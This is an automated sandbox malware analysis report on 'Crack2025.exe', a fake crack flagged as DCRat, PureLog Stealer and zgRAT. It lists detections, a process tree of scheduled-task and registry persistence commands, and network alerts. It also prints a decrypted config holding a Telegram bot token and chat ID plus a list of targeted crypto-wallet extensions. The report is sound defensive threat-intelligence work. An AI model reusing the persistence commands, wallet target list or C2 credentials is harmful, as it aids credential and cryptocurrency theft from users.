Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Crack2025.exe

Overview

General Information

Sample name:Crack2025.exe
Analysis ID:1639972
MD5:8799753790734ab065ddfdf5fadf4c9f
SHA1:64bf9d7eadc069096c95fa363e36455545a529f1
SHA256:c8af00d11b473b532868ad15bafda07122c04e69982c140533b693945b166090
Tags:DCRatexeuser-aachum
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Crack2025.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Crack2025.exe" MD5: 8799753790734AB065DDFDF5FADF4C9F)
    • wscript.exe (PID: 4100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 8336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComComponentRuntimeMonitor.exe (PID: 8388 cmdline: "C:\Crtsvc/ComComponentRuntimeMonitor.exe" MD5: 9939A508443B50F3065506B3EF554C79)
          • schtasks.exe (PID: 8628 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8652 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFY" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8684 cmdline: schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 5 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 8708 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 8784 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 8812 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8840 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8864 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8888 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 10 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8912 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHv" /sc ONLOGON /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8940 cmdline: schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 8 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8964 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8992 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9020 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9044 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9068 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9092 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9116 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 5 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9140 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitor" /sc ONLOGON /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 9168 cmdline: schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 6 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • xP1x1VNeIAPjWsHHYbBFNFY.exe (PID: 8668 cmdline: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • aePhPQ5epIOPbGayHv.exe (PID: 6116 cmdline: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • aePhPQ5epIOPbGayHv.exe (PID: 5156 cmdline: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • Registry.exe (PID: 3432 cmdline: C:\Users\Public\Pictures\Registry.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • Registry.exe (PID: 412 cmdline: C:\Users\Public\Pictures\Registry.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Crtsvc\ComComponentRuntimeMonitor.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Crtsvc\ComComponentRuntimeMonitor.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ProgramData\smartscreen.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Pictures\Registry.exe, CommandLine: C:\Users\Public\Pictures\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pictures\Registry.exe, NewProcessName: C:\Users\Public\Pictures\Registry.exe, OriginalFileName: C:\Users\Public\Pictures\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Users\Public\Pictures\Registry.exe, ProcessId: 3432, ProcessName: Registry.exe
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetFilename: C:\Users\All Users\smartscreen.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Pictures\Registry.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xP1x1VNeIAPjWsHHYbBFNFY
                          Sigma detected: CurrentVersion NT Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe", EventID: 13, EventType: SetValue, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", ProcessId: 8708, ProcessName: csc.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f, ProcessId: 9044, ProcessName: schtasks.exe
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Crack2025.exe", ParentImage: C:\Users\user\Desktop\Crack2025.exe, ParentProcessId: 7144, ParentProcessName: Crack2025.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" , ProcessId: 4100, ProcessName: wscript.exe
                          Sigma detected: Dynamic CSharp Compile Artefact
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ProcessId: 8388, TargetFilename: C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline

                          Data Obfuscation

                          barindex
                          Sigma detected: Dot net compiler compiles file from suspicious location
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline", ProcessId: 8708, ProcessName: csc.exe

                          Persistence and Installation Behavior

                          barindex
                          Sigma detected: Schedule system process
                          Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Crtsvc/ComComponentRuntimeMonitor.exe", ParentImage: C:\Crtsvc\ComComponentRuntimeMonitor.exe, ParentProcessId: 8388, ParentProcessName: ComComponentRuntimeMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f, ProcessId: 8964, ProcessName: schtasks.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-16T19:31:51.117740+010020480951A Network Trojan was detected192.168.2.549732172.67.159.13880TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-16T19:31:24.394548+010028033053Unknown Traffic192.168.2.54972534.117.59.81443TCP
                          2025-03-16T19:32:24.401908+010028033053Unknown Traffic192.168.2.54973934.117.59.81443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-16T19:31:25.584055+010018100091Potentially Bad Traffic192.168.2.549728149.154.167.220443TCP
                          2025-03-16T19:32:25.363006+010018100091Potentially Bad Traffic192.168.2.549740149.154.167.220443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\tvkLaiES.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\Public\Pictures\Registry.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbeAvira: detection malicious, Label: VBS/Runner.VPA
                          Source: C:\Users\user\Desktop\KbrbnaEo.logAvira: detection malicious, Label: TR/Spy.xaclu
                          Source: C:\Users\user\Desktop\kMRvrGzk.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\Users\user\AppData\Local\Temp\GDyy9YDsU6.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\ProgramData\smartscreen.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\Default\Desktop\ShellExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Multi AV Scanner detection for dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeReversingLabs: Detection: 65%
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeReversingLabs: Detection: 65%
                          Source: C:\ProgramData\smartscreen.exeReversingLabs: Detection: 65%
                          Source: C:\Users\Default\Desktop\ShellExperienceHost.exeReversingLabs: Detection: 65%
                          Source: C:\Users\Public\Pictures\Registry.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\Desktop\SFAQXTUW.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\ZgWXldfI.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\biIGHMkD.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\kMRvrGzk.logReversingLabs: Detection: 34%
                          Source: C:\Users\user\Desktop\tvkLaiES.logReversingLabs: Detection: 70%
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeReversingLabs: Detection: 65%
                          Multi AV Scanner detection for submitted file
                          Source: Crack2025.exeVirustotal: Detection: 72%Perma Link
                          Source: Crack2025.exeReversingLabs: Detection: 66%
                          Joe Sandbox ML detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Sample uses string decryption to hide its real strings
                          Source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"TelegramNotifer":{"chatid":"6289890180","bottoken":"7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"}}
                          Source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-lyFL9C96UdpRArWkuUmQ","0","????????+??????????","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                          Source: Crack2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49724 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49740 version: TLS 1.2
                          Source: Crack2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Crack2025.exe
                          Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.pdb source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B4A69B
